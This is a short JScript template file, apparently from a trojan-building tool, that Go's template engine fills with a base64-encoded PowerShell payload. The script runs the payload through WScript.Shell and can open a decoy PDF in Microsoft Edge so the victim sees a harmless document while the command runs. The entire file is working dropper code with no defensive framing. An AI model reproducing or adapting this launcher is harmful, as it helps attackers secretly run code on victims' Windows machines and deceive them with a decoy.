trojantool/cmd/jscript.gojs
2023-08-30 08:57:28 +02:00

15 lines
No EOL
433 B
JavaScript

var base64EncodedBinary = "{{.Encoded}}";
var shell = new ActiveXObject("WScript.Shell");
var command = "powershell.exe -encodedcommand " + base64EncodedBinary;
shell.Run(command, 1, true);
{{if len .EncodedDecoy}}
var dataUri = "data:application/pdf;base64,{{.EncodedDecoy}}";
var shell = new ActiveXObject("Shell.Application");
shell.ShellExecute("msedge.exe", dataUri, "", "open", 1);
{{end}}
{{/* vim: syntax=javascript */}}